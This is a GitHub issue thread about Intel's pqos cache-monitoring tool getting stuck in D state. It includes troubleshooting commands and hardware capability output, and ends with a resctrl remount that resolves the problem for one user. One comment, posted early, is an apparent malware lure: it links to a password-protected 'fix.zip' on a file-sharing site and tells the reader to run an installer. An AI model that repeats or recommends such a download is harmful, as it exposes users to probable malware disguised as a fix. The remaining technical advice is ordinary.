### ISSUE TITLE
pqos trapped in D state

### ISSUE THREAD

**Issue by realChocobi** [intel/intel-cmt-cat#282]
Having installed intel-cmt-cat, I ran pqos command, and quitted by ctrl-c.
![image](https://github.com/user-attachments/assets/d8a6fe89-0512-4360-a711-8a87237fc016)

When I tried to run pqos again, I found it hard to quit by ctrl-c.
![image](https://github.com/user-attachments/assets/e537f184-f173-420f-b9f3-abd2058d7615)

I killed the process (PID 36957), but I found another process (PID 36958) whose cmdline is pqos.
The process(PID 36958) cannot be killed.
![image](https://github.com/user-attachments/assets/fd1d0d46-710a-4752-a541-3f6e80ed2b93)

Now I cannot check my LLC usage via pqos, as shown in the following picture.
![image](https://github.com/user-attachments/assets/04339229-4a10-4555-ac3b-4fe1ef253dea)

I have to reboot my system. However, when I run pqos command again, I will experience the above failures one more time.

Could you please help me check the potential causes?
Thank you!

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ztz1989** [comment]
I encountered exactly the same issue. Could you please help us? Thanks!

**Comment by rkanagar** [comment]
Hi @ztz1989 ,
        What pqos version are you using?.  Try "sudo rm /var/lock/libpqos.lock" command also. Please make sure you are using latest release v24.05(pqos 6.0.0).
         The pqos tool uses OS interface by default. Try to use with --iface=msr. Reset monitoring using below command:
pqos --iface=msr -r -d

**Comment by ztz1989** [comment]
Hi @rkanagar, thanks a lot for the information. 

I am using the latest release:
```
$ sudo pqos  --version
NOTE:  Mixed use of MSR and kernel interfaces to manage
       CAT or CMT & MBM may lead to unexpected behavior.
PQoS Tool version: 6.0.0
```
I removed the libpqos under /var/lock, but the problem persists. Then I tried the command again with --iface=msr. I also reset monitoring using -r and -d, "sudo pqos" command still got stuck without any further output. 

My server runs Ubuntu 18.04 LTS, I don't know if I should downgrade pqos accordingly. If you have any ideas, please let me know. Thanks again for your help!

**Comment by rkanagar** [comment]
Hi @ztz1989 ,
        The pqos 6.0.0 works in Ubuntu 18.04.  What is the output of following commands after reboot the machine:
sudo pqos --iface=msr -d
sudo pqos --iface=msr -D
sudo pqos --iface=msr

**Comment by ztz1989** [comment]
@rkanagar,

The output of "sudo pqos --iface=msr -d" is
```
NOTE:  Mixed use of MSR and kernel interfaces to manage
       CAT or CMT & MBM may lead to unexpected behavior.
Hardware capabilities
    Monitoring
        Cache Monitoring Technology (CMT) events:
            LLC Occupancy (LLC)
                 I/O RDT: unsupported
        Memory Bandwidth Monitoring (MBM) events:
            Total Memory Bandwidth (TMEM)
                 I/O RDT: unsupported
            Local Memory Bandwidth (LMEM)
                 I/O RDT: unsupported
            Remote Memory Bandwidth (RMEM) (calculated)
                 I/O RDT: unsupported
        PMU events:
            Instructions/Clock (IPC)
            LLC misses
            LLC references
    Allocation
        Cache Allocation Technology (CAT)
            L3 CAT
                CDP: disabled
                Non-Contiguous CBM: unsupported
                I/O RDT: unsupported
                Num COS: 16
```
The output of "sudo pqos --iface=msr -D" is
```
NOTE:  Mixed use of MSR and kernel interfaces to manage
       CAT or CMT & MBM may lead to unexpected behavior.
Hardware capabilities
    Monitoring
        Cache Monitoring Technology (CMT) events:
            LLC Occupancy (LLC)
                 I/O RDT: unsupported
                 scale factor: 40960
                 max rmid: 80
                 counter length: 24b
        Memory Bandwidth Monitoring (MBM) events:
            Total Memory Bandwidth (TMEM)
                 I/O RDT: unsupported
                 scale factor: 40960
                 max rmid: 80
                 counter length: 24b
            Local Memory Bandwidth (LMEM)
                 I/O RDT: unsupported
                 scale factor: 40960
                 max rmid: 80
                 counter length: 24b
            Remote Memory Bandwidth (RMEM) (calculated)
                 I/O RDT: unsupported
                 scale factor: 40960
                 max rmid: 80
                 counter length: 24b
        PMU events:
            Instructions/Clock (IPC)
            LLC misses
            LLC references
    Allocation
        Cache Allocation Technology (CAT)
            L3 CAT
                CDP: disabled
                Non-Contiguous CBM: unsupported
                I/O RDT: unsupported
                Num COS: 16
                Way size: 1310720 bytes
                Ways contention bit-mask: 0xc0000
                Min CBM bits: 1
                Max CBM bits: 20
Cache information
    L3 Cache
        Num ways: 20
        Way size: 1310720 bytes
        Num sets: 20480
        Line size: 64 bytes
        Total size: 26214400 bytes
    L2 Cache
        Num ways: 8
        Way size: 32768 bytes
        Num sets: 512
        Line size: 64 bytes
        Total size: 262144 bytes
```
Then I executed sudo pqos --iface=msr, it works without any problem:
```
TIME 2024-08-28 20:22:19 CORE         IPC      MISSES     LLC[KB]   MBL[MB/s]   MBR[MB/s]
       0        0.89          0k       600.0         0.0         0.0
       1        0.54          0k       520.0         0.4         0.0
       2        0.61          0k        80.0         0.0         0.0
       3        0.20          0k       240.0         0.0         0.0
       4        0.79          0k       320.0         0.1         0.0
       5        0.66          0k       160.0         0.0         0.0
       6        0.13          0k        40.0         0.0         0.0
       7        0.08          0k       120.0         0.0         0.0
       8        0.15          0k       520.0         0.0         0.0
       9        0.12          0k       240.0         0.1         0.0
      10        0.28          0k        80.0         0.0         0.0
      11        0.14          0k         0.0         0.0         0.0
      12        0.57          0k       120.0         0.1         0.0
      13        0.70          0k        80.0         0.0         0.0
      14        0.40          0k      3240.0         0.1         0.0
      15        0.08          0k      1160.0         0.0         0.0
      16        0.60          0k      1240.0         0.1         0.0
      17        0.61          0k        40.0         0.0         0.0
      18        0.30          0k        40.0         0.0         0.0
      19        0.45          0k        40.0         0.0         0.0
```
By the way, if I try the command without specifying the interface, the output is as follows: 
```
sudo pqos
NOTE:  Mixed use of MSR and kernel interfaces to manage
       CAT or CMT & MBM may lead to unexpected behavior.
ERROR: os_cap_init() error 3
Error initializing PQoS library!
```

**Comment by rkanagar** [comment]
Hi @ztz1989 ,
    Please make sure the resctrl is mounted properly after the reboot.
sudo mount -t resctrl resctrl -o cdp,mba_MBps /sys/fs/resctrl

resctrl wiki page:
https://github.com/intel/intel-cmt-cat/wiki/resctrl

**Comment by ztz1989** [comment]
Problem solved, thanks a lot for the clear explanation! @rkanagar

**Comment by realChocobi** [comment]
> Hi @ztz1989 , Please make sure the resctrl is mounted properly after the reboot. sudo mount -t resctrl resctrl -o cdp,mba_MBps /sys/fs/resctrl
> 
> resctrl wiki page: https://github.com/intel/intel-cmt-cat/wiki/resctrl

I remount resctrl but triggered an error as follows:
![image](https://github.com/user-attachments/assets/3d304e51-6300-4632-baf2-b28165ec035b)

How to tackle this issue?
